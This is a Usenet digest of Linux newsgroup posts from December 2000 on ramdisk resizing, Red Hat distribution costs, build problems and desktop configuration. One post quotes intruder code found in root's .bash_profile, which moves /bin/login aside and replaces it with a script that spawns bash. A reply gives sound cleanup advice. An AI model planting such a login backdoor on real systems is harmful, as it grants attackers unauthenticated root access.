From: [EMAIL PROTECTED] (Dances With Crows)
Subject: Re: ramdisk size
Date: 12 Dec 2000 04:17:07 GMT

On Tue, 12 Dec 2000 03:47:15 +0000 (UTC), David Efflandt staggered
into the Black Sun and said:
>On 11 Dec 2000 19:36:08 GMT, Timo Benk <[EMAIL PROTECTED]> wrote:
>>>No. The FS is mostly the meta info. The inodes and the inode tables. The
>>>blocks backing those inodes may exist (or not) in various senses.
>>
>>Now I'm really confused. How can I use such a ramdisk and change ( either by
>>myself or let it be done by the kernel ) the size of this ramdisk. I see
>>only two ways to do that:
[snip]
>>I think Louis meant that in his posting talking about using an image.
>>That way I can imagine that the kernel will grow the ramdisk to
>>the needed size, but I tried it and it doesn't work.
>>
>>So is that my fault or is it just impossible to change the ramdisk size
>>without rebooting or reloading the ramdisk module?

>The ramdisk can automatically resize if you copy an image to it, but if
>you put a filesystem on it I believe you have to specify the size of the
>filesystem.  I just dynamically resized it and it worked without rebooting
>or manually reloading any modules.
>
>Here is before and after:
>/dev/ram              2.0M  512k  1.5M  25% /home/efflandt/seti-ram
>/dev/ram              3.9M  512k  3.4M  13% /home/efflandt/seti-ram
>
>I initially created it in /etc/rc.d/rc.local and resized it by simply
>copy and pasting each line to the prompt, but changing 2048 to 4096:
>
># set up ramdisk for setiathome
>/bin/dd if=/dev/zero of=/dev/ram bs=1k count=2048
>/sbin/mke2fs -vm0 /dev/ram 2048
>/bin/mount -t ext2 /dev/ram /home/efflandt/seti-ram
>
>Then I copied the files to it, and changed permissions and ownership.

(whoof.  OK, anyone who knows what I'm talking about for sure, feel free
to correct any part of the following!)

Um, yeah.  So what happens if you try to "dd if=/dev/zero of=/dev/ram0
bs=1k"?  Where does it return ENOSPC?  I'm guessing at 4096K, unless
you specified something different with the rd_size parameter when you
insmod'ed rd.  I've looked at the code briefly and done a couple of
tests on my systems (running kernel 2.2.17) and come up with this:

The RAMdisk driver doesn't allocate memory until a process requests it
by writing to /dev/ramX.  Then, it allocates as much memory as it needs,
up to the limit specified in the rd_size parameter.  If you made rd_size
too small, and you have more memory, you can get more by accessing
/dev/ram(X+1).  I'm guessing you could combine multiple /dev/ramX
devices together with Linear Append Mode and get a big RAM-based storage
device, but that'd be... um, convoluted.  And probably a big hairy
kludge.

Large RAMdisks would be useful for a few things, but you can't just
specify rd_size as a huge number 'cause of the problems you get if the
kernel tries to allocate more RAM than is physically present.  (Or can
you?)  Anyway, if people are truly interested in making the RAMdisk
driver more flexible by letting it resize itself via some ioctl(),
they'd probably benefit by reading the rd.c source and/or talking on the
IRC channel #kernelnewbies .  I'd mess around with this myself, but
device drivers are not my bag at the moment.

To the original poster:  If you could post *why* you need to resize the
RAMdisk, maybe someone could offer a workaround that involves something
else?  Worth a shot, at least.  HTH, and remember that I'm probably
wrong about a number of things here....

Brainbench MVP for Linux Admin /  Workin' in a code mine, hittin' Ctrl-Alt
http://www.brainbench.com     /   Workin' in a code mine, whoops!
=============================/    I hit a seg fault....

------------------------------

From: "news" <[EMAIL PROTECTED]>
Subject: suggest me one which can handle multiple POP3 email addresses?
Date: Tue, 12 Dec 2000 13:13:12 +0900

I have installed RedHat 6. It's working fine. The KDE can handle dialup very
efficiently. But I need an email client. I have visited the site.

can anyone suggest me one which can handle multiple POP3 email addresses?

Thank you in advance.

Joarder

From: Robert Heller <[EMAIL PROTECTED]>
Subject: Re: Considering Linux. Advantages over Solaris? Which version?
Date: 11 Dec 2000 22:55:10 true

  "Garry Heaton" <[EMAIL PROTECTED]>,
  In a message on Sun, 10 Dec 2000 23:55:03 -0000, wrote :

"H> I want to run a UNIX flavour in order to optimise Perl development. Is Linux
"H> easier to use than Solaris? I saw Red Hat 7 listed at £120 which isn't
"H> exactly "free" as the open source movement suggests. On the other hand I
"H> don't want to install an inferior version of Linux just because it's
"H> cheaper/free. Is Red Hat worth the money? Which other Linux versions are
"H> worth considering and what are the trade-offs?

The £120 gets you the box and the *printed* manual.  Plus a post card
you can send to RedHat to get support.  You can:

        download an ISO image of the CDs (650meg -- do you have a really
fast InterNet connection and a CDR burner?) for free.  This image is
*exactly* the same as the CD in the box.
        buy a bare CD for US $2.00 from www.linuxmall.com (again the
same CD as in the box).

These last two options don't include the printed manual or the
support/registration postcard.

The 'bits' are the same in all cases.

There really is only one 'Linux' kernel.  The various *distributions*
vary in terms of packaging, support software collections, installer
software, extra goodies, and tech. support and such like.

"Is Red Hat [boxed set] worth the money?"  Depends.  If you need
hand-holding, probably.  If not, no -- get a 'bare' CD from linuxmall
or if you are at a university (or work for a 'liberal' company),
download the ISO image on the university's or company's T1 line and burn
your own CD.  Note: one can substitute "SuSE", "Slackware", "Corel",
"Mandrake", etc. for "Red Hat", depending on your preferences, etc.

"H>
"H> Thanks
"H>
"H> Garry Heaton
"H>
"H>
"H>

--
                                     \/
Robert Heller                        ||InterNet:   [EMAIL PROTECTED]

------------------------------

From: Robert Heller <[EMAIL PROTECTED]>
Date: 11 Dec 2000 22:55:11 true

  "Garry Heaton" <[EMAIL PROTECTED]>,
  In a message on Mon, 11 Dec 2000 00:56:12 -0000, wrote :

"H> Just checked "cheapbytes" but the Standard Edition of Red Hat 7 was listed
"H> at $29 = £21 plust $23 = £16 shipping. Where did you see the £2/3 offer? Are
"H> there any European/UK sites which offer similar deals?

Look for the 'bare' CD versions.  The 'Standard Edition of Red Hat 7' is
just the same box you might see on store shelves -- CDs + book in a
'big' box.  The bare CD versions are just the CD in a jewel case -- no
book, no box, no support/registration postcard -- no hand holding.

"H>
"H> Thanks Scott
"H>
"H> Garry
"H>
"H>
"H> "Scooter" <[EMAIL PROTECTED]> wrote in message
"H> news:[EMAIL PROTECTED]...
"H> > Garry Heaton wrote:
"H> >
"H> > > I want to run a UNIX flavour in order to optimise Perl development. Is
"H> Linux
"H> > > easier to use than Solaris? I saw Red Hat 7 listed at £120 which isn't
"H> > > exactly "free" as the open source movement suggests. On the other hand I
"H> > > don't want to install an inferior version of Linux just because it's
"H> > > cheaper/free. Is Red Hat worth the money? Which other Linux versions are
"H> > > worth considering and what are the trade-offs?
"H> > >
"H> > > Thanks
"H> > >
"H> > > Garry Heaton
"H> >
"H> > If you are willing to forego Red Hat support, you can purchase the same
"H> Red Hat
"H> > distribution from a competing site such as www.cheapbytes.com at vastly
"H> reduced
"H> > prices -- about 2 to 3 pounds if I am figuring the exchange rate
"H> correctly.
"H> > This is legal, due to the terms of the Gnu Public License. Of course, you
"H> will
"H> > not receive technical support from Red Hat unless you purchase their
"H> official
"H> > product.
"H> >
"H> > Re. ease of use vs. Solaris, I cannot speak to that as I have only worked
"H> a
"H> > couple of months in a Solaris environment, and only development at that --
"H> no
"H> > system adminstration.
"H> >
"H> > Best of luck.
"H> >
"H> > Scott F. Williams
"H> >
"H>
"H>
"H>

--
                                     \/

From: "Generic User" <[EMAIL PROTECTED]>
Subject: Help building DDD
Date: Tue, 12 Dec 2000 04:46:33 GMT

I have RH7.0 and downloaded the source files from the official
DDD site. During the configure command, I get a "Cannot access
-lX11 libraries; use the -x-include-libraries=DIR option." So I do
and to no avail. I see the libraries in /usr/X11R6/lib and I even
set environment variable LD_LIBRARY_PATH to include this.

Any clues? Note DDD RPM from RedHat requires a motif but
the DDD source files require Lesstif, which I already have installed.
Hence I'm going the source route instead of the RPM route.

-chris

------------------------------

From: [EMAIL PROTECTED]
Subject: Re: /dev/loop7 forced check
Date: Tue, 12 Dec 2000 04:57:58 GMT

Not expecting you to be. ArmedLinux is the distro I'm trying to run it
under win98, on an AMD K6-2 400, 64mb ram, Trident Blade 3d AGP.
anything else needed?

From: Stanislaw Flatto <[EMAIL PROTECTED]>
Subject: Re: What is the difference?
Date: Tue, 12 Dec 2000 16:33:15 +0000

"Peter T. Breuer" wrote:

> John Hasler <[EMAIL PROTECTED]> wrote:
> > Keith writes:
> >> What is the difference between Publishers, Standard, and Professinal
> >> Edition of Linux?
>
> > They are three different members of the empty set.
>
> He's not gonna geddit.
>
> But then I'm not going to explain his error either!
>
> Peter

We always learn.

Have fun.

--
Stanislaw
Linux counter No.162760

------------------------------

From: Stanislaw Flatto <[EMAIL PROTECTED]>
Subject: Re: Is it possible to do?
Date: Tue, 12 Dec 2000 16:36:53 +0000

Denis wrote:

> Hi,
> Is it possible to make Linux run xdaliclock on top of the screen saver?
> Thank you.

Linux is different age group Lego. You can do anything if you don't lose
your patience.

Have fun.

--
Stanislaw
Linux counter No.162760

------------------------------

From: "andrew phuong" <[EMAIL PROTECTED]>
Subject: how read from stdin in csh
Date: Tue, 12 Dec 2000 16:34:20 +1100

Hi all,

I'm creating a C-shell script and I am to prompt the user for
a value.  Reading the value can be done in sh shell, however
does anyone know of a way of doing this in the C sh.

I know it can be done in tcsh, but the syntax
for it does not work in csh.  i.e using "$<".  I'm looking
for a solution that works in csh

thanks in advance

Andrew

------------------------------

From: "William Pelish" <[EMAIL PROTECTED]>
Subject: Corel and Cable and.......
Date: Tue, 12 Dec 2000 01:24:21 -0500

I am having problems with Corel linux finding the cablemodem or its live
feed. It has found the mod for theNIC card, but I cannot get a signal after
that. Does anyone have suggestions? Also it cannot find the dialup modem at
all its a kflex56a any suggestions for this mod as well?

Will

From: "Henry Cho" <[EMAIL PROTECTED]>
Subject: Help.. Does my computer get intruded???
Date: Tue, 12 Dec 2000 14:37:34 +0800

Does anybody knows what the following circumstance is:

I use Red Hat 6.2 as my server. my ftp server suddenly can't work, when I
use windows ftp (e.g. ws_ftp, cuteftp) the files are prefixed and suffixed
with strange characters, e.g.
abc.txt -> abc.txt
directory -> Directory
exec.file -> exec.file
I even can't issue su command to log in as root.

I come to my server and found it was in promiscuous mode. I suspected if the
root password was being hacked. But I found that the root password had not
been changed. I log in as root and reboot the computer, most of the services
(including X Font server, console mouse, sendmail, inetd cron, etc...) can't
be shut down properly with the error message -- no such pid.
After rebooting, all the thing seems to be started properly with [OK]
returned. However when I login in it again, the server even can't ping, and
I reboot the computer again, I finds that most of the services can't be shut
down again. Again, the services seems to be started properly with [OK]
returned, I still can't ping, and I type linuxconf, and choose networking
with the same options as before, and ask to activate the change (actually
nothing was changed). The log file said that the inetd can't be shut down
because no such pid again, but was restarted properly. And this time I can
ping, and also telnet to other's computer. When I reboot the above problem
was found again..

I found the following strange code in my root's .bash_profile: (which was
just between the server was working properly and got dead)
cd /tmp
ls -la
echo > log
echo '#!/bin/bash' > log
echo /bin/bash >> log;
cat log
mv /bin/login/ /tmp/login
cp log /bin/login
chmod +wrx /bin/login
exit

Is my computer get intruded?? And what can I do if so? And how can I fix the
problem?

------------------------------

From: [EMAIL PROTECTED] (Bit Twister)
Subject: Re: Help.. Does my computer get intruded???
Date: Tue, 12 Dec 2000 06:41:37 GMT

On Tue, 12 Dec 2000 14:37:34 +0800, Henry Cho <[EMAIL PROTECTED]> wrote:

>Is my computer get intruded?? And what can I do if so? And how can I fix the
>problem?

Your system has been cracked.

Any time your know a box is cracked, you should:
        pull the box off the network,
        save any data,
        save a full copy of the box for digital forensics,
        refomat disk drives and fresh install to remove any
        possible back doors the cracker installed.

Here is why
   http://www.linuxdoc.org/LDP/LG/issue36/kuethe.html

Could go here to get an ipchain/table firewall script.
http://linux-firewall-tools.com/linux/firewall/index.html

You might want to read Armoring Linux
                http://www.enteract.com/~lspitz/linux.html
and             http://www.securityportal.com/lskb/articles/
and             http://www.securityportal.com/lasg/
and             http://www.cert.org/advisories/

Check on the vendor site for security updates to your distro.

------------------------------

From: "Germ" <[EMAIL PROTECTED]>
Subject: new 2 linux
Date: Tue, 12 Dec 2000 01:42:11 -0500

i gotz a question...... i am running mandrake 7.2 and using kde.... how do u
change themes and install new themes that u dl.... thanx ahead of time :)

Ger][V][

------------------------------

From: Tony Sweeney <[EMAIL PROTECTED]>
Crossposted-To: comp.unix.bsd.freebsd.misc
Subject: Re: DIAMOND:STEALTH III 540, 32MB, AGP, SAVAGE4 CHIPSET
Date: Tue, 12 Dec 2000 06:45:05 GMT

------------------------------

From: [EMAIL PROTECTED] (Bit Twister)
Subject: Re: new 2 linux
Date: Tue, 12 Dec 2000 06:55:11 GMT

On Tue, 12 Dec 2000 01:42:11 -0500, Germ <[EMAIL PROTECTED]> wrote:
>i gotz a question...... i am running mandrake 7.2 and using kde.... how do u
>change themes and install new themes that u dl.... thanx ahead of time :)

Might look here
http://kde.themes.org/php/docs.phtml?docid=21&secid=3.2

------------------------------

From: J Sloan <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.admin,comp.os.linux.hardware,comp.os.linux.questions
Subject: Re: Recognizing multiple CPUs
Date: Tue, 12 Dec 2000 06:58:38 GMT

ekk wrote:

> Maybe he should wait on RH 7.0, and settle for 6.1 since GCC is not
> adequate in 7.0 . . .

hmm, I have found no problems with gcc in 7.0 - in fact it
fixes some bugs that were in previous versions of gcc.

However, the kernel should be compiled with gcc-2.91,
which is included with RH 7.0 for just that purpose, as
the "Kgcc" package.

As I mentioned, I'm running RH 7.0 and kernel 2.4.0 test
on a 4 CPU Compaq box w/ 1 GB RAM and it's quite solid.

But for Joe 6-pack, I'd recommend waiting until the 2.4
kernel is an officially released rpm.

jjs